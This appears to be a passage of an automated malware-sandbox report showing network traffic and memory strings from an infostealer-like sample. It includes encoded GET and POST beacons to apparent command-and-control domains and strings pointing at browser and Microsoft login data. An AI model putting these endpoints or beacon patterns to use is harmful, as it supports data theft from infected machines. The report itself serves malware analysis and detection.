            Source: global trafficHTTP traffic detected: GET /r0a9/?8RN4oRq=ZYHb+yN+RN7ZtjbwI7SB23xqPJJsxDr8Rawhra04/gYnM82mZx5+8Ykp6tR7PNEw3bB584nn/0BLo1rj87ovLgV9i3rHjjPoDRBTQtWr7711poFsTmp7tSOMnBMqrIuiMn54qIs=&SBV8T=1lJpZfbXA4K HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.integritywork.shopUser-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
            Source: global trafficHTTP traffic detected: GET /xqh1/?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ontohealth.netUser-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
            Source: global trafficHTTP traffic detected: GET /3tnk/?8RN4oRq=CW2JkxV3pcekLoIorT56ryscgS11ntIpF5Aeg7ZfnKRiExYc+D8BbmUzHwDhufn4r4Dro/61FctGFi0noZVWC4EErF1Fy7sjRinEodY+GdyVC1Z8TkDJNhe4fZdCuwZwItNyPB0=&SBV8T=1lJpZfbXA4K HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.c6ytv.netUser-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
            Source: global trafficHTTP traffic detected: GET /f8et/?SBV8T=1lJpZfbXA4K&8RN4oRq=Xc+PdMClmL/WIO2isq0x5LlJuoJRDXdLpdKh2o4ZOQaHQca6wh6b+iZ++523jXtiu5eeO8fPpGm95hdP5yrPQZ/IU8CBx+hGfkwf4+1MD46FKwSALgSHTW1ViZ9EzcIAYloemhI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.sadey.infoUser-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.uphc255.vip
            Source: global trafficDNS traffic detected: DNS query: www.integritywork.shop
            Source: global trafficDNS traffic detected: DNS query: www.ontohealth.net
            Source: global trafficDNS traffic detected: DNS query: www.c6ytv.net
            Source: global trafficDNS traffic detected: DNS query: www.sadey.info
            Source: unknownHTTP traffic detected: POST /xqh1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheConnection: closeContent-Length: 212Content-Type: application/x-www-form-urlencodedHost: www.ontohealth.netOrigin: http://www.ontohealth.netReferer: http://www.ontohealth.net/xqh1/User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16Data Raw: 38 52 4e 34 6f 52 71 3d 47 66 6b 70 57 31 36 77 64 67 53 36 69 46 32 39 57 64 2b 50 48 73 72 58 4c 33 33 63 78 6b 45 79 64 4b 31 38 69 4d 75 2b 48 48 6f 6a 70 46 49 79 47 75 6b 35 6a 4d 72 2b 4c 41 2f 4a 56 6e 43 55 42 48 76 6f 50 34 6b 4c 4f 75 45 75 55 59 50 4e 55 56 6e 39 6f 6c 42 7a 70 31 55 32 73 67 47 38 66 38 70 74 52 61 30 33 79 77 75 52 44 7a 53 73 2f 31 35 74 77 31 6b 36 71 37 31 5a 78 58 48 6c 76 74 51 43 76 79 43 30 70 78 63 49 67 6d 48 52 69 67 45 44 6f 6f 35 62 56 56 62 52 62 4e 39 51 4e 58 44 78 6c 7a 6a 55 58 76 44 53 43 48 66 38 76 4b 6f 57 2b 39 7a 6c 62 32 79 65 64 50 30 2f 70 79 36 51 4a 35 58 2f 71 34 6d 79 Data Ascii: 8RN4oRq=GfkpW16wdgS6iF29Wd+PHsrXL33cxkEydK18iMu+HHojpFIyGuk5jMr+LA/JVnCUBHvoP4kLOuEuUYPNUVn9olBzp1U2sgG8f8ptRa03ywuRDzSs/15tw1k6q71ZxXHlvtQCvyC0pxcIgmHRigEDoo5bVVbRbN9QNXDxlzjUXvDSCHf8vKoW+9zlb2yedP0/py6QJ5X/q4my
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 06 Nov 2024 15:07:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 06 Nov 2024 15:07:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 06 Nov 2024 15:07:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 06 Nov 2024 15:07:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:07:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:07:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:07:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:07:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000000.2258645214.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: rmfPfCOHcNt.exe, 00000017.00000002.3359416956.0000000004D78000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sadey.info
            Source: rmfPfCOHcNt.exe, 00000017.00000002.3359416956.0000000004D78000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sadey.info/f8et/
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: EhStorAuthn.exe, 00000016.00000003.2884633566.000000000767B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.drString found in binary or memory: https://www.globalsign.com/repository/0
